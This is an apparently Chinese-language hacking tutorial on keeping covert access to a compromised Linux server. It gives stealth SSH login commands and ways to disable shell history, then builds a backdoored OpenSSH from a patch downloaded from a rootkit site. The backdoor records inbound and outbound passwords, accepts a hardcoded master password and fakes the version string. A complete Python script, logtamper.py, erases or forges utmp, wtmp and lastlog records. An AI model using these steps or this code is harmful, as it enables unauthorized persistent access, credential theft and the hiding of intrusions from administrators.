隐藏的远程登录(w 看不到)
ssh -T user @ host /bin/bash -i 或
隐藏的远程登录(w 看不到)
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -if
对于SSH来说,登录主机之后先执行:
unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace
然后是SSH留后门的方法,简单来说就是以下的代码:
yum install -y openssl openssl-devel pam-devel
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
http://ftp.vim.org/security/OpenSSH/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门
执行vi includes.h
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //你后门的密码
执行vi version.h
#define SSH_VERSION "填入之前记下来的版本号,伪装原版本"
#define SSH_PORTABLE "小版本号"
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make && make install
service sshd restart //重启sshd
接下来删除登录的历史记录,使用logtamper.py代码复制过来:
#!/usr/bin/env python
import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)
def getXtmp(filename, username, hostname):
xtmp = ''
try:
fp = open(filename, 'rb')
while True:
bytes = fp.read(XTMP_STRUCT_SIZE)
if not bytes:
break
data = struct.unpack(XTMP_STRUCT, bytes)
record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
if (record[4] == username and record[5] == hostname):
continue
xtmp += bytes
except:
showMessage('Cannot open file: %s' % filename)
finally:
fp.close()
return xtmp
def modifyLast(filename, username, hostname, ttyname, strtime):
try:
p = getpwnam(username)
except:
showMessage('No such user.')
timestamp = 0
try:
str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
timestamp = int(mktime(str2time))
except:
showMessage('Time format err.')
data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
try:
fp = open(filename, 'wb')
fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
fp.write(data)
except:
showMessage('Cannot open file: %s' % filename)
finally:
fp.close()
return True
def showMessage(msg):
print msg
exit(-1)
def saveFile(filename, contents):
try:
fp = open(filename, 'w+b')
fp.write(contents)
except IOError as e:
showMessage(e)
finally:
fp.close()
if __name__ == '__main__':
usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
parser = OptionParser(usage=usage)
parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
parser.add_option('-t', '--ttyname', dest='TTYNAME')
parser.add_option('-f', '--filename', dest='FILENAME')
parser.add_option('-u', '--username', dest='USERNAME')
parser.add_option('-i', '--hostname', dest='HOSTNAME')
parser.add_option('-d', '--dateline', dest='DATELINE')
(options, args) = parser.parse_args()
if len(args) < 3:
if options.MODE == '1':
if options.USERNAME == None or options.HOSTNAME == None:
showMessage('+[Warning]: Incorrect parameter.\n')
if options.FILENAME == None:
options.FILENAME = UTMPFILE
# tamper
newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
saveFile(options.FILENAME, newData)
elif options.MODE == '2':
if options.USERNAME == None or options.HOSTNAME == None:
showMessage('+[Warning]: Incorrect parameter.\n')
if options.FILENAME == None:
options.FILENAME = WTMPFILE
# tamper
newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
saveFile(options.FILENAME, newData)
elif options.MODE == '3':
if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
showMessage('+[Warning]: Incorrect parameter.\n')
if options.FILENAME == None:
options.FILENAME = LASTLOGFILE
# tamper
modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
else:
parser.print_help()